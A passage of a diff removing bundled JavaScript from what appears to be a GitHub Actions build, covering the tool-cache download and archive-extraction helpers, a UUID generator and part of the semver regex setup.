__createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; -const core = __importStar(__nccwpck_require__(2186)); -const io = __importStar(__nccwpck_require__(7436)); -const fs = __importStar(__nccwpck_require__(7147)); -const mm = __importStar(__nccwpck_require__(2473)); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const httpm = __importStar(__nccwpck_require__(6255)); -const semver = __importStar(__nccwpck_require__(5911)); -const stream = __importStar(__nccwpck_require__(2781)); -const util = __importStar(__nccwpck_require__(3837)); -const assert_1 = __nccwpck_require__(9491); -const v4_1 = __importDefault(__nccwpck_require__(7468)); -const exec_1 = __nccwpck_require__(1514); -const retry_helper_1 = __nccwpck_require__(8279); -class HTTPError extends Error { - constructor(httpStatusCode) { - super(`Unexpected HTTP response: ${httpStatusCode}`); - this.httpStatusCode = httpStatusCode; - Object.setPrototypeOf(this, new.target.prototype); - } -} -exports.HTTPError = HTTPError; -const IS_WINDOWS = process.platform === 'win32'; -const IS_MAC = process.platform === 'darwin'; -const userAgent = 'actions/tool-cache'; -/** - * Download a tool from an url and stream it into a file - * - * @param url url of tool to download - * @param dest path to download tool - * @param auth authorization header - * @param headers other headers - * @returns path to downloaded tool - */ -function downloadTool(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - dest = dest || path.join(_getTempDirectory(), v4_1.default()); - yield io.mkdirP(path.dirname(dest)); - core.debug(`Downloading ${url}`); - core.debug(`Destination ${dest}`); - const maxAttempts = 3; - const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); - const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); - const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); - return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { - return yield downloadToolAttempt(url, dest || '', auth, headers); - }), (err) => { - if (err instanceof HTTPError && err.httpStatusCode) { - // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests - if (err.httpStatusCode < 500 && - err.httpStatusCode !== 408 && - err.httpStatusCode !== 429) { - return false; - } - } - // Otherwise retry - return true; - }); - }); -} -exports.downloadTool = downloadTool; -function downloadToolAttempt(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (fs.existsSync(dest)) { - throw new Error(`Destination file path ${dest} already exists`); - } - // Get the response headers - const http = new httpm.HttpClient(userAgent, [], { - allowRetries: false - }); - if (auth) { - core.debug('set auth'); - if (headers === undefined) { - headers = {}; - } - headers.authorization = auth; - } - const response = yield http.get(url, headers); - if (response.message.statusCode !== 200) { - const err = new HTTPError(response.message.statusCode); - core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); - throw err; - } - // Download the response body - const pipeline = util.promisify(stream.pipeline); - const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); - const readStream = responseMessageFactory(); - let succeeded = false; - try { - yield pipeline(readStream, fs.createWriteStream(dest)); - core.debug('download complete'); - succeeded = true; - return dest; - } - finally { - // Error, delete dest before retry - if (!succeeded) { - core.debug('download failed'); - try { - yield io.rmRF(dest); - } - catch (err) { - core.debug(`Failed to delete '${dest}'. ${err.message}`); - } - } - } - }); -} -/** - * Extract a .7z file - * - * @param file path to the .7z file - * @param dest destination directory. Optional. - * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this - * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will - * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is - * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line - * interface, it is smaller than the full command line interface, and it does support long paths. At the - * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. - * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path - * to 7zr.exe can be pass to this function. - * @returns path to the destination directory - */ -function extract7z(file, dest, _7zPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - const originalCwd = process.cwd(); - process.chdir(dest); - if (_7zPath) { - try { - const logLevel = core.isDebug() ? '-bb1' : '-bb0'; - const args = [ - 'x', - logLevel, - '-bd', - '-sccUTF-8', - file - ]; - const options = { - silent: true - }; - yield exec_1.exec(`"${_7zPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - else { - const escapedScript = path - .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') - .replace(/'/g, "''") - .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - command - ]; - const options = { - silent: true - }; - try { - const powershellPath = yield io.which('powershell', true); - yield exec_1.exec(`"${powershellPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - return dest; - }); -} -exports.extract7z = extract7z; -/** - * Extract a compressed tar archive - * - * @param file path to the tar - * @param dest destination directory. Optional. - * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. - * @returns path to the destination directory - */ -function extractTar(file, dest, flags = 'xz') { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - // Create dest - dest = yield _createExtractFolder(dest); - // Determine whether GNU tar - core.debug('Checking tar --version'); - let versionOutput = ''; - yield exec_1.exec('tar --version', [], { - ignoreReturnCode: true, - silent: true, - listeners: { - stdout: (data) => (versionOutput += data.toString()), - stderr: (data) => (versionOutput += data.toString()) - } - }); - core.debug(versionOutput.trim()); - const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); - // Initialize args - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - if (core.isDebug() && !flags.includes('v')) { - args.push('-v'); - } - let destArg = dest; - let fileArg = file; - if (IS_WINDOWS && isGnuTar) { - args.push('--force-local'); - destArg = dest.replace(/\\/g, '/'); - // Technically only the dest needs to have `/` but for aesthetic consistency - // convert slashes in the file arg too. - fileArg = file.replace(/\\/g, '/'); - } - if (isGnuTar) { - // Suppress warnings when using GNU tar to extract archives created by BSD tar - args.push('--warning=no-unknown-keyword'); - args.push('--overwrite'); - } - args.push('-C', destArg, '-f', fileArg); - yield exec_1.exec(`tar`, args); - return dest; - }); -} -exports.extractTar = extractTar; -/** - * Extract a xar compatible archive - * - * @param file path to the archive - * @param dest destination directory. Optional. - * @param flags flags for the xar. Optional. - * @returns path to the destination directory - */ -function extractXar(file, dest, flags = []) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - args.push('-x', '-C', dest, '-f', file); - if (core.isDebug()) { - args.push('-v'); - } - const xarPath = yield io.which('xar', true); - yield exec_1.exec(`"${xarPath}"`, _unique(args)); - return dest; - }); -} -exports.extractXar = extractXar; -/** - * Extract a zip - * - * @param file path to the zip - * @param dest destination directory. Optional. - * @returns path to the destination directory - */ -function extractZip(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - dest = yield _createExtractFolder(dest); - if (IS_WINDOWS) { - yield extractZipWin(file, dest); - } - else { - yield extractZipNix(file, dest); - } - return dest; - }); -} -exports.extractZip = extractZip; -function extractZipWin(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - // build the powershell command - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const pwshPath = yield io.which('pwsh', false); - //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory - //and the -Force flag for Expand-Archive as a fallback - if (pwshPath) { - //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive - const pwshCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, - `try { [System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, - `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` - ].join(' '); - const args = [ - '-NoLogo', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - pwshCommand - ]; - core.debug(`Using pwsh at path: ${pwshPath}`); - yield exec_1.exec(`"${pwshPath}"`, args); - } - else { - const powershellCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, - `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, - `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` - ].join(' '); - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - powershellCommand - ]; - const powershellPath = yield io.which('powershell', true); - core.debug(`Using powershell at path: ${powershellPath}`); - yield exec_1.exec(`"${powershellPath}"`, args); - } - }); -} -function extractZipNix(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - const unzipPath = yield io.which('unzip', true); - const args = [file]; - if (!core.isDebug()) { - args.unshift('-q'); - } - args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run - yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); - }); -} -/** - * Caches a directory and installs it into the tool cacheDir - * - * @param sourceDir the directory to cache into tools - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheDir(sourceDir, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source dir: ${sourceDir}`); - if (!fs.statSync(sourceDir).isDirectory()) { - throw new Error('sourceDir is not a directory'); - } - // Create the tool dir - const destPath = yield _createToolPath(tool, version, arch); - // copy each child item. do not move. move can fail on Windows - // due to anti-virus software having an open handle on a file. - for (const itemName of fs.readdirSync(sourceDir)) { - const s = path.join(sourceDir, itemName); - yield io.cp(s, destPath, { recursive: true }); - } - // write .complete - _completeToolPath(tool, version, arch); - return destPath; - }); -} -exports.cacheDir = cacheDir; -/** - * Caches a downloaded file (GUID) and installs it - * into the tool cache with a given targetName - * - * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. - * @param targetFile the name of the file name in the tools directory - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheFile(sourceFile, targetFile, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source file: ${sourceFile}`); - if (!fs.statSync(sourceFile).isFile()) { - throw new Error('sourceFile is not a file'); - } - // create the tool dir - const destFolder = yield _createToolPath(tool, version, arch); - // copy instead of move. move can fail on Windows due to - // anti-virus software having an open handle on a file. - const destPath = path.join(destFolder, targetFile); - core.debug(`destination file ${destPath}`); - yield io.cp(sourceFile, destPath); - // write .complete - _completeToolPath(tool, version, arch); - return destFolder; - }); -} -exports.cacheFile = cacheFile; -/** - * Finds the path to a tool version in the local installed tool cache - * - * @param toolName name of the tool - * @param versionSpec version of the tool - * @param arch optional arch. defaults to arch of computer - */ -function find(toolName, versionSpec, arch) { - if (!toolName) { - throw new Error('toolName parameter is required'); - } - if (!versionSpec) { - throw new Error('versionSpec parameter is required'); - } - arch = arch || os.arch(); - // attempt to resolve an explicit version - if (!isExplicitVersion(versionSpec)) { - const localVersions = findAllVersions(toolName, arch); - const match = evaluateVersions(localVersions, versionSpec); - versionSpec = match; - } - // check for the explicit version in the cache - let toolPath = ''; - if (versionSpec) { - versionSpec = semver.clean(versionSpec) || ''; - const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); - core.debug(`checking cache: ${cachePath}`); - if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { - core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); - toolPath = cachePath; - } - else { - core.debug('not found'); - } - } - return toolPath; -} -exports.find = find; -/** - * Finds the paths to all versions of a tool that are installed in the local tool cache - * - * @param toolName name of the tool - * @param arch optional arch. defaults to arch of computer - */ -function findAllVersions(toolName, arch) { - const versions = []; - arch = arch || os.arch(); - const toolPath = path.join(_getCacheDirectory(), toolName); - if (fs.existsSync(toolPath)) { - const children = fs.readdirSync(toolPath); - for (const child of children) { - if (isExplicitVersion(child)) { - const fullPath = path.join(toolPath, child, arch || ''); - if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { - versions.push(child); - } - } - } - } - return versions; -} -exports.findAllVersions = findAllVersions; -function getManifestFromRepo(owner, repo, auth, branch = 'master') { - return __awaiter(this, void 0, void 0, function* () { - let releases = []; - const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; - const http = new httpm.HttpClient('tool-cache'); - const headers = {}; - if (auth) { - core.debug('set auth'); - headers.authorization = auth; - } - const response = yield http.getJson(treeUrl, headers); - if (!response.result) { - return releases; - } - let manifestUrl = ''; - for (const item of response.result.tree) { - if (item.path === 'versions-manifest.json') { - manifestUrl = item.url; - break; - } - } - headers['accept'] = 'application/vnd.github.VERSION.raw'; - let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); - if (versionsRaw) { - // shouldn't be needed but protects against invalid json saved with BOM - versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); - try { - releases = JSON.parse(versionsRaw); - } - catch (_a) { - core.debug('Invalid json'); - } - } - return releases; - }); -} -exports.getManifestFromRepo = getManifestFromRepo; -function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { - return __awaiter(this, void 0, void 0, function* () { - // wrap the internal impl - const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); - return match; - }); -} -exports.findFromManifest = findFromManifest; -function _createExtractFolder(dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!dest) { - // create a temp dir - dest = path.join(_getTempDirectory(), v4_1.default()); - } - yield io.mkdirP(dest); - return dest; - }); -} -function _createToolPath(tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - core.debug(`destination ${folderPath}`); - const markerPath = `${folderPath}.complete`; - yield io.rmRF(folderPath); - yield io.rmRF(markerPath); - yield io.mkdirP(folderPath); - return folderPath; - }); -} -function _completeToolPath(tool, version, arch) { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - const markerPath = `${folderPath}.complete`; - fs.writeFileSync(markerPath, ''); - core.debug('finished caching tool'); -} -/** - * Check if version string is explicit - * - * @param versionSpec version string to check - */ -function isExplicitVersion(versionSpec) { - const c = semver.clean(versionSpec) || ''; - core.debug(`isExplicit: ${c}`); - const valid = semver.valid(c) != null; - core.debug(`explicit? ${valid}`); - return valid; -} -exports.isExplicitVersion = isExplicitVersion; -/** - * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` - * - * @param versions array of versions to evaluate - * @param versionSpec semantic version spec to satisfy - */ -function evaluateVersions(versions, versionSpec) { - let version = ''; - core.debug(`evaluating ${versions.length} versions`); - versions = versions.sort((a, b) => { - if (semver.gt(a, b)) { - return 1; - } - return -1; - }); - for (let i = versions.length - 1; i >= 0; i--) { - const potential = versions[i]; - const satisfied = semver.satisfies(potential, versionSpec); - if (satisfied) { - version = potential; - break; - } - } - if (version) { - core.debug(`matched: ${version}`); - } - else { - core.debug('match not found'); - } - return version; -} -exports.evaluateVersions = evaluateVersions; -/** - * Gets RUNNER_TOOL_CACHE - */ -function _getCacheDirectory() { - const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; - assert_1.ok(cacheDirectory, 'Expected RUNNER_TOOL_CACHE to be defined'); - return cacheDirectory; -} -/** - * Gets RUNNER_TEMP - */ -function _getTempDirectory() { - const tempDirectory = process.env['RUNNER_TEMP'] || ''; - assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); - return tempDirectory; -} -/** - * Gets a global variable - */ -function _getGlobal(key, defaultValue) { - /* eslint-disable @typescript-eslint/no-explicit-any */ - const value = global[key]; - /* eslint-enable @typescript-eslint/no-explicit-any */ - return value !== undefined ? value : defaultValue; -} -/** - * Returns an array of unique values. - * @param values Values to make unique. - */ -function _unique(values) { - return Array.from(new Set(values)); -} -//# sourceMappingURL=tool-cache.js.map - -/***/ }), - -/***/ 7701: -/***/ ((module) => { - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -var byteToHex = []; -for (var i = 0; i < 256; ++i) { - byteToHex[i] = (i + 0x100).toString(16).substr(1); -} - -function bytesToUuid(buf, offset) { - var i = offset || 0; - var bth = byteToHex; - // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 - return ([ - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]] - ]).join(''); -} - -module.exports = bytesToUuid; - - -/***/ }), - -/***/ 7269: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -// Unique ID creation requires a high quality random # generator. In node.js -// this is pretty straight-forward - we use the crypto API. - -var crypto = __nccwpck_require__(6113); - -module.exports = function nodeRNG() { - return crypto.randomBytes(16); -}; - - -/***/ }), - -/***/ 7468: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -var rng = __nccwpck_require__(7269); -var bytesToUuid = __nccwpck_require__(7701); - -function v4(options, buf, offset) { - var i = buf && offset || 0; - - if (typeof(options) == 'string') { - buf = options === 'binary' ? new Array(16) : null; - options = null; - } - options = options || {}; - - var rnds = options.random || (options.rng || rng)(); - - // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - rnds[6] = (rnds[6] & 0x0f) | 0x40; - rnds[8] = (rnds[8] & 0x3f) | 0x80; - - // Copy bytes to buffer, if provided - if (buf) { - for (var ii = 0; ii < 16; ++ii) { - buf[i + ii] = rnds[ii]; - } - } - - return buf || bytesToUuid(rnds); -} - -module.exports = v4; - - -/***/ }), - -/***/ 5911: -/***/ ((module, exports) => { - -exports = module.exports = SemVer - -var debug -/* istanbul ignore next */ -if (typeof process === 'object' && - process.env && - process.env.NODE_DEBUG && - /\bsemver\b/i.test(process.env.NODE_DEBUG)) { - debug = function () { - var args = Array.prototype.slice.call(arguments, 0) - args.unshift('SEMVER') - console.log.apply(console, args) - } -} else { - debug = function () {} -} - -// Note: this is the semver.org version of the spec that it implements -// Not necessarily the package version of this code. -exports.SEMVER_SPEC_VERSION = '2.0.0' - -var MAX_LENGTH = 256 -var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || - /* istanbul ignore next */ 9007199254740991 - -// Max safe segment length for coercion. -var MAX_SAFE_COMPONENT_LENGTH = 16 - -var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 - -// The actual regexps go on exports.re -var re = exports.re = [] -var safeRe = exports.safeRe = [] -var src = exports.src = [] -var t = exports.tokens = {} -var R = 0 - -function tok (n) { - t[n] = R++ -} - -var LETTERDASHNUMBER = '[a-zA-Z0-9-]' - -// Replace some greedy regex tokens to prevent regex dos issues. These regex are -// used internally via the safeRe object since all inputs in this library get -// normalized first to trim and collapse all extra whitespace. The original -// regexes are exported for userland consumption and lower level usage. A -// future breaking change could export the safer regex only with a note that -// all input should have extra whitespace removed. -var safeRegexReplacements = [ - ['\\s', 1], - ['\\d', MAX_LENGTH], - [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], -] - -function makeSafeRe (value) { - for (var i = 0; i < safeRegexReplacements.length; i++) { - var token = safeRegexReplacements[i][0] - var max = safeRegexReplacements[i][1] - value = value - .split(token + '*').join(token + '{0,' + max + '}') - .split(token + '+').join(token + '{1,' + max + '}') - } - return value -} - -// The following Regular Expressions can be used for tokenizing, -// validating, and parsing SemVer version strings. - -// ## Numeric Identifier -// A single `0`, or a non-zero digit followed by zero or more digits. - -tok('NUMERICIDENTIFIER') -src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' -tok('NUMERICIDENTIFIERLOOSE') -src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' - -// ## Non-numeric Identifier -// Zero or more digits, followed by a letter or hyphen, and then zero or -// more letters, digits, or hyphens. - -tok('NONNUMERICIDENTIFIER') -src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' - -// ## Main Version -// Three dot-separated numeric identifiers. - -tok('MAINVERSION') -src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')' - -tok('MAINVERSIONLOOSE') -src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' - -// ## Pre-release Version Identifier -// A numeric identifier, or a non-numeric identifier. - -tok('PRERELEASEIDENTIFIER') -src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -tok('PRERELEASEIDENTIFIERLOOSE') -src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -// ## Pre-release Version -// Hyphen, followed by one or more dot-separated pre-release version -// identifiers. - -tok('PRERELEASE') -src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' - -tok('PRERELEASELOOSE') -src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' - -// ## Build Metadata Identifier -// Any combination of digits, letters, or hyphens. - -tok('BUILDIDENTIFIER') -src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' - -// ## Build Metadata -// Plus sign, followed by one or more period-separated build metadata -// identifiers. - -tok('BUILD') -src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + - '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' - -// ## Full Version String -// A main version, followed optionally by a pre-release version and -// build metadata. - -// Note that the only major, minor, patch, and pre-release sections of -// the version string are capturing groups. The build metadata is not a -// capturing group, because it should not ever be used in version -// comparison. - -tok('FULL') -tok('FULLPLAIN') -src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + - src[t.PRERELEASE] + '?' + - src[t.BUILD] + '?' - -src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' - -// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. -// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty -// common in the npm registry. -tok('LOOSEPLAIN') -src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + - src[t.PRERELEASELOOSE] + '?' + - src[t.BUILD] + '?' - -tok('LOOSE') -src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' - -tok('GTLT') -src[t.GTLT] = '((?:<|>)?=?)' - -// Something like "2.*" or "1.2.x". -// Note that "x.x" is a valid xRange identifer, meaning "any version" -// Only the first item is strictly required. -tok('XRANGEIDENTIFIERLOOSE') -src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' -tok('XRANGEIDENTIFIER') -src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' - -tok('XRANGEPLAIN') -src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:' + src[t.PRERELEASE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGEPLAINLOOSE') -src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:' + src[t.PRERELEASELOOSE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGE') -src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' -tok('XRANGELOOSE') -src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' - -// Coercion. -// Extract anything that could conceivably be a part of a valid semver -tok('COERCE') -src[t.COERCE] = '(^|[^\\d])' + - '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:$|[^\\d])' -tok('COERCERTL') -re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') -safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') - -// Tilde ranges. -// Meaning is "reasonably at or greater than" -tok('LONETILDE') -src[t.LONETILDE] = '(?:~>?)' - -tok('TILDETRIM') -src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' -re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') -safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') -var tildeTrimReplace = '$1~' - -tok('TILDE') -src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' -tok('TILDELOOSE') -src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' - -// Caret ranges. -// Meaning is "at least and backwards compatible with" -tok('LONECARET') -src[t.LONECARET] = '(?:\\^)' - -tok('CARETTRIM') -src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' -re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') -safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') -var caretTrimReplace = '$1^' - -tok('CARET') -src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' -tok('CARETLOOSE') -src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' - -// A simple gt/lt/eq thing, or just "" to indicate "any version" -tok('COMPARATORLOOSE') -src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' -tok('COMPARATOR') -src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' - -// An expression to strip any whitespace between the gtlt and the thing -// it modifies, so that `> 1.2.3` ==> `>1.2.3` -tok('COMPARATORTRIM') -src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + - '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' - -// this one has to use the /g flag -re[t.COMPARATORTRIM] = new 